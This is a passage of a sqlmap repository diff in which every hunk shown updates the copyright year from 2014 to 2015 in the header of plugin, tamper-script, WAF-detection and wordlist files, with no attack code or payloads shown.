-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py
index 7ced5bc41..6fa1295d2 100644
--- a/plugins/generic/databases.py
+++ b/plugins/generic/databases.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index 30d2213fc..628f01049 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index a3198cdaa..23826f7e7 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index cdfbd20cc..61692f639 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py
index 3cbc11e98..87bfc655c 100644
--- a/plugins/generic/fingerprint.py
+++ b/plugins/generic/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
index cc2b38599..108c55943 100644
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/search.py b/plugins/generic/search.py
index 6e9c2fe75..1a4a5b02b 100644
--- a/plugins/generic/search.py
+++ b/plugins/generic/search.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py
index 5a3a77d04..42a67bd9d 100644
--- a/plugins/generic/syntax.py
+++ b/plugins/generic/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index e4aa96249..d3a782fcb 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/users.py b/plugins/generic/users.py
index c7c2bc731..41081dac1 100644
--- a/plugins/generic/users.py
+++ b/plugins/generic/users.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/sqlmap.py b/sqlmap.py
index 025fc1b3a..1c949f95c 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/sqlmapapi.py b/sqlmapapi.py
index 089cc80c8..03a2807e7 100755
--- a/sqlmapapi.py
+++ b/sqlmapapi.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/__init__.py b/tamper/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/tamper/__init__.py
+++ b/tamper/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py
index 6f779e61d..78c17f328 100644
--- a/tamper/apostrophemask.py
+++ b/tamper/apostrophemask.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py
index 75f652341..6b0930679 100644
--- a/tamper/apostrophenullencode.py
+++ b/tamper/apostrophenullencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py
index 763c78643..faae3a2e4 100644
--- a/tamper/appendnullbyte.py
+++ b/tamper/appendnullbyte.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/base64encode.py b/tamper/base64encode.py
index f5520f067..cda5619dd 100644
--- a/tamper/base64encode.py
+++ b/tamper/base64encode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/between.py b/tamper/between.py
index f2e0f91bf..f7331bd9f 100644
--- a/tamper/between.py
+++ b/tamper/between.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py
index c80a48c28..a26cdadf7 100644
--- a/tamper/bluecoat.py
+++ b/tamper/bluecoat.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py
index e6af4a2f9..3b6a5301f 100644
--- a/tamper/chardoubleencode.py
+++ b/tamper/chardoubleencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/charencode.py b/tamper/charencode.py
index 3e7f76183..9df3e9624 100644
--- a/tamper/charencode.py
+++ b/tamper/charencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py
index e36b055bd..09e602957 100644
--- a/tamper/charunicodeencode.py
+++ b/tamper/charunicodeencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py
index c087e6e3f..5182bd8d5 100644
--- a/tamper/concat2concatws.py
+++ b/tamper/concat2concatws.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py
index 9b78ee8ca..d9ccf0082 100644
--- a/tamper/equaltolike.py
+++ b/tamper/equaltolike.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/greatest.py b/tamper/greatest.py
index a7fbfeaff..cf4688361 100644
--- a/tamper/greatest.py
+++ b/tamper/greatest.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py
index 7bd9d5e23..c0d0eea5c 100644
--- a/tamper/halfversionedmorekeywords.py
+++ b/tamper/halfversionedmorekeywords.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py
index 749a271ae..499cc6218 100644
--- a/tamper/ifnull2ifisnull.py
+++ b/tamper/ifnull2ifisnull.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/lowercase.py b/tamper/lowercase.py
index fae01a3e3..e06706af5 100644
--- a/tamper/lowercase.py
+++ b/tamper/lowercase.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py
index 7901fd656..1d38e5344 100644
--- a/tamper/modsecurityversioned.py
+++ b/tamper/modsecurityversioned.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py
index 8abe281aa..ac13da0b8 100644
--- a/tamper/modsecurityzeroversioned.py
+++ b/tamper/modsecurityzeroversioned.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py
index 83c4e9d79..c08607512 100644
--- a/tamper/multiplespaces.py
+++ b/tamper/multiplespaces.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py
index 49beda7bb..5feb443cc 100644
--- a/tamper/nonrecursivereplacement.py
+++ b/tamper/nonrecursivereplacement.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py
index 2723cb004..ac2885d7a 100644
--- a/tamper/overlongutf8.py
+++ b/tamper/overlongutf8.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/percentage.py b/tamper/percentage.py
index dcdeb9992..e54495739 100644
--- a/tamper/percentage.py
+++ b/tamper/percentage.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/randomcase.py b/tamper/randomcase.py
index 3e7a60caa..a188ff0cc 100644
--- a/tamper/randomcase.py
+++ b/tamper/randomcase.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py
index 1b6b0a04c..6c0894eb1 100644
--- a/tamper/randomcomments.py
+++ b/tamper/randomcomments.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/securesphere.py b/tamper/securesphere.py
index fc5896433..ab83f46fc 100644
--- a/tamper/securesphere.py
+++ b/tamper/securesphere.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/sp_password.py b/tamper/sp_password.py
index 25cf3a1e8..959e50257 100644
--- a/tamper/sp_password.py
+++ b/tamper/sp_password.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2comment.py b/tamper/space2comment.py
index ad32f39e5..399a2c0ee 100644
--- a/tamper/space2comment.py
+++ b/tamper/space2comment.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2dash.py b/tamper/space2dash.py
index 69eb43f71..cdd828d56 100644
--- a/tamper/space2dash.py
+++ b/tamper/space2dash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2hash.py b/tamper/space2hash.py
index cb59750c1..a50a3a7c2 100644
--- a/tamper/space2hash.py
+++ b/tamper/space2hash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py
index f208e9f37..0dbaf5c2a 100644
--- a/tamper/space2morehash.py
+++ b/tamper/space2morehash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py
index 0f1dcbad3..fc0542f53 100644
--- a/tamper/space2mssqlblank.py
+++ b/tamper/space2mssqlblank.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py
index 6c911fb42..cddfd6179 100644
--- a/tamper/space2mssqlhash.py
+++ b/tamper/space2mssqlhash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py
index 4538ec78c..a0ac1da68 100644
--- a/tamper/space2mysqlblank.py
+++ b/tamper/space2mysqlblank.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py
index d8cbf542d..4a4f9821c 100644
--- a/tamper/space2mysqldash.py
+++ b/tamper/space2mysqldash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2plus.py b/tamper/space2plus.py
index cb8facf91..38211026a 100644
--- a/tamper/space2plus.py
+++ b/tamper/space2plus.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py
index ebe22edcc..98612534a 100644
--- a/tamper/space2randomblank.py
+++ b/tamper/space2randomblank.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py
index 35ce36dfb..3bb234141 100644
--- a/tamper/unionalltounion.py
+++ b/tamper/unionalltounion.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py
index b37f6c0eb..c2bcca8da 100644
--- a/tamper/unmagicquotes.py
+++ b/tamper/unmagicquotes.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/varnish.py b/tamper/varnish.py
index 14f4c6728..00d54bb43 100644
--- a/tamper/varnish.py
+++ b/tamper/varnish.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py
index 42e3212b7..7c5c5db32 100644
--- a/tamper/versionedkeywords.py
+++ b/tamper/versionedkeywords.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py
index df07e2424..d5fc44db1 100644
--- a/tamper/versionedmorekeywords.py
+++ b/tamper/versionedmorekeywords.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py
index 198c524ce..e2bcdbca9 100644
--- a/tamper/xforwardedfor.py
+++ b/tamper/xforwardedfor.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/thirdparty/bottle/__init__.py b/thirdparty/bottle/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/thirdparty/bottle/__init__.py
+++ b/thirdparty/bottle/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/txt/common-columns.txt b/txt/common-columns.txt
index edbba30a0..3464db5fc 100644
--- a/txt/common-columns.txt
+++ b/txt/common-columns.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 id
diff --git a/txt/common-outputs.txt b/txt/common-outputs.txt
index efe569bed..623c07554 100644
--- a/txt/common-outputs.txt
+++ b/txt/common-outputs.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 [Banners]
diff --git a/txt/common-tables.txt b/txt/common-tables.txt
index ee4e71b48..9468c9382 100644
--- a/txt/common-tables.txt
+++ b/txt/common-tables.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 users
diff --git a/txt/keywords.txt b/txt/keywords.txt
index 496d41c58..240c47429 100644
--- a/txt/keywords.txt
+++ b/txt/keywords.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 # SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
diff --git a/txt/user-agents.txt b/txt/user-agents.txt
index 6c49e41cc..c8dea4c1c 100644
--- a/txt/user-agents.txt
+++ b/txt/user-agents.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1)
diff --git a/waf/360.py b/waf/360.py
index f30b934e2..cc8b4c615 100644
--- a/waf/360.py
+++ b/waf/360.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/__init__.py b/waf/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/waf/__init__.py
+++ b/waf/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/airlock.py b/waf/airlock.py
index 39efadac6..6a5b433b7 100644
--- a/waf/airlock.py
+++ b/waf/airlock.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/anquanbao.py b/waf/anquanbao.py
index 9b2302914..430ce942a 100644
--- a/waf/anquanbao.py
+++ b/waf/anquanbao.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/baidu.py b/waf/baidu.py
index 600bc57c1..fc9cc9d21 100644
--- a/waf/baidu.py
+++ b/waf/baidu.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/barracuda.py b/waf/barracuda.py
index 265858136..41866a8ad 100644
--- a/waf/barracuda.py
+++ b/waf/barracuda.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/bigip.py b/waf/bigip.py
index f5b844e32..4023d0395 100644
--- a/waf/bigip.py
+++ b/waf/bigip.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/binarysec.py b/waf/binarysec.py
index 876d69da7..268a8a2e2 100644
--- a/waf/binarysec.py
+++ b/waf/binarysec.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/blockdos.py b/waf/blockdos.py
index 0841c654c..adcc902e3 100644
--- a/waf/blockdos.py
+++ b/waf/blockdos.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/ciscoacexml.py b/waf/ciscoacexml.py
index 7d927c6c3..89834a64e 100644
--- a/waf/ciscoacexml.py
+++ b/waf/ciscoacexml.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
